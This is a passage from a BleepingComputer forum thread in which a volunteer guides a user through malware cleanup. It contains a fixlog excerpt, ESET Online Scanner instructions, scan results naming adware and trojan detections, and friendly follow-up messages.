successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files (x86)\mobisynapse\mobisynapse.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files (x86)\mobisynapse\mobisynapse.exe" => not found "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin hostetler\appdata\local\temp\g2_2329\g2viewer.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program files (x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program files\mozilla firefox\firefox.exe" => removed successfully "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program files\mozilla firefox\firefox.exe" => removed successfully "C:\ProgramData\milon.com" => not found "C:\ProgramData\ddond.com" => not found C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision => moved successfully "C:\Users\Karin Hostetler\AppData\Local\mbam" => not found "C:\Users\Karin Hostetler\AppData\Local\Temp" folder move: Could not move "C:\Users\Karin Hostetler\AppData\Local\Temp" => Scheduled to move on reboot. C:\ProgramData\Temp => moved successfully =========== "C:\Users\Karin Hostetler\AppData\Roaming\*.tmp" ========== C:\Users\Karin Hostetler\AppData\Roaming\.hxAIsa.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\bd.rJIC.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\DckGdea.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\itapowq.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\kGuDepI.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\kk.eKk..tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\qBsHy.t.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\ufxiGDB.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\wJEAH.D.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\wvFqolG.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\ymwjjBw.tmp => moved successfully C:\Users\Karin Hostetler\AppData\Roaming\zuKyJyr.tmp => moved successfully ========= End -> "C:\Users\Karin Hostetler\AppData\Roaming\*.tmp" ======== Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 24-03-2022 09:46:45) C:\Users\Karin Hostetler\AppData\Local\Temp => Could not move ==== End of Fixlog 09:46:51 ==== Thank you again!!!! I truly, truly appreciate your help! Karin * Back to top -------------------------------------------------------------------------------- #6 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 24 March 2022 - 09:37 AM You are quite welcome Karin. We took quite a bite out of things. Please do this. =================================================== ESET Online Scanner -------------------- Note: You can expect this process to take a long time, up to several hours or more. * Download ESET Free Online Scanner and save it to your Desktop * Right click on esetonlinescanner_enu.exe and select Run as administrator * Click Computer Scan * Click Full scan * Select Enable ESET to detect and quarantine potentially unwanted applications * Click Start scan * Once completed click Save scan log and save it to your Desktop as ESETScan.txt * Click Continue then finally click Close * Copy and paste the ESETScan.txt file contents in your reply =================================================== Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. * ESET report * Update on computer performance Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- #7 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 24 March 2022 - 08:15 PM Hi Gary, Took 9 hours, (scanned my external hard drive also) 3/24/2022 21:11:14 PM Files scanned: 874277 Detected files: 19 Cleaned files: 19 Total scan time 09:18:41 Scan status: Finished C:\AdwCleaner\Quarantine\v1\20220324.090337\10\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\11\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\12\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\13\Host App Service\Engine\HostAppServiceUpdater (1).exe#B3D56172C1308D4E a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\13\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\14\Host App Service\Engine\HostAppServiceUpdater (1).exe#B3D56172C1308D4E a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\14\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\15\Host App Service\Engine\HostAppServiceUpdater (1).exe#B3D56172C1308D4E a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\15\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\16\Host App Service\Uninstall (1).exe#895879AA94E52644 a variant of Win32/Pokki.A potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\18\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\19\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\20\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\AdwCleaner\Quarantine\v1\20220324.090337\9\Host App Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\113W82LC\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\defaultuser0\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe a variant of Win64/Pokki.B potentially unwanted application cleaned by deleting Operating memory a variant of Win32/Agent.TJS trojan retained * Back to top -------------------------------------------------------------------------------- #8 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 24 March 2022 - 09:01 PM ESET is very thorough and worth the wait. Things are looking good. Are there any remaining questions or concerns you might have before I post some tool/log clean up instructions and other information for you to consider going forward? Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- #9 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 24 March 2022 - 09:13 PM HI Gary, Thorough is an understatement.... lol. My only question was the final line Operating memory a variant of Win32/Agent.TJS trojan retained Is this something to be concerned about? Other than that, I don't think I have anything else to ask. I do want to thank you again for all of your help. I know that this is a volunteer situation and I truly appreciate all of your time and effort. Thank you again! Karin * Back to top -------------------------------------------------------------------------------- #10 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 24 March 2022 - 09:44 PM Greetings Karin. No, I don't believe that is of concern when the remainder of your computer is malware free. That detection is normally associated with a malicious program that loads information into the memory to facilitate interfering with normal computer/program behavior. We can run additional scans if you'd like, or even run ESET again to see if it is detected again. Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- #11 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 24 March 2022 - 09:58 PM Hi Gary, I think I'll rerun the ESET. Hopefully it will be gone. I set it for a custom scan of the actual desktop and disregarded the external harddrive. I hope that wasn't a dumb move * Back to top -------------------------------------------------------------------------------- #12 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 24 March 2022 - 10:06 PM No, that is perfectly fine. Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- #13 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 24 March 2022 - 10:25 PM I'll let you know in the morning 6AM is only 6.5 hrs away and this old girl needs to get some rest. Thanks so much for all of your help, you have NO idea how much I appreciate it. I know it's volunteer, but do you have a favorite charity or cause that could use a donation? I'd like to pay this forward SOMEHOW. * Back to top -------------------------------------------------------------------------------- #14 KTAIT80 ktait80 * Topic Starter * * Members * 30 posts * ONLINE * Local time:02:27 PM Posted 25 March 2022 - 07:35 AM uh oh ??? 3/25/2022 8:13:39 AM Files scanned: 771842 Detected files: 10 Cleaned files: 10 Total scan time 08:58:46 Scan status: Finished C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\113W82LC\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[2].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[3].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[4].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\GC43WY82\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[1].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[2].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[3].htm JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting C:\Users\Karin Hostetler\AppData\Roaming\Microsoft\Office\Recent\file.url LNK/Agent.CH trojan cleaned by deleting * Back to top -------------------------------------------------------------------------------- #15 OH MY! Oh My! Adware and Spyware and Malware * * Malware Response Instructor * 49,691 posts * OFFLINE * Gender:Male * Location:California * Local time:11:27 AM Posted 25 March 2022 - 07:47 AM Good Morning Karin. Yes, I do have an idea about appreciation. Years ago I stumbled upon BleepingComputer in my own time of need and was so impressed with the site and the kindness of the people who solved my issues I decided to enter the training program to become a helper. I try never to forget the sinking feeling of not knowing what to do to resolve my computer problem. There is no real need to pay it forward but I realize some people want to express appreciation in that way. I am also a volunteer with a radio ministry, Truth for Life, that has played an important role in my life for 20+ years. The true primary reason for me being at this site is so that I can subtly proclaim my Savior and what He has done for me, as is referenced in my signature line. Getting back to business, I am interested to see the ESET results. Quite honestly, I have never seen that type of reference to memory corruption. Gary "Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God." Where to Start * Back to top -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- * Page 1 of 4 * 1 * 2 * 3 * Next * » Back to Virus, Trojan, Spyware, and Malware Removal Help * * * * * * * * * * 1 USER(S) ARE READING THIS TOPIC 1 members, 0 guests, 0 anonymous users ktait80 Reply to quoted posts Clear 1. BleepingComputer.com 2. → Security 3. → Virus, Trojan, Spyware, and Malware Removal Help 4. Privacy Policy 5. Rules · * * Help Advertise | About Us | Terms of Use | Privacy Policy | Sitemap | Chat | RSS Feeds | Contact Us Tech Support Forums | Virus Removal Guides | Downloads | Tutorials | The Computer Glossary | Uninstall List | Startups | The File Database © 2004-2022 All Rights Reserved Bleeping Computer LLC . Site Changelog Community Forum Software by IP.Board SIGN IN * Use Twitter * Need an account? Register now! * Username * Forum Password I've forgotten my password * Remember me This is not recommended for shared computers * Sign in anonymously Don't add me to the active users list * Privacy Policy JUMP TO PAGE JUMP TO PAGE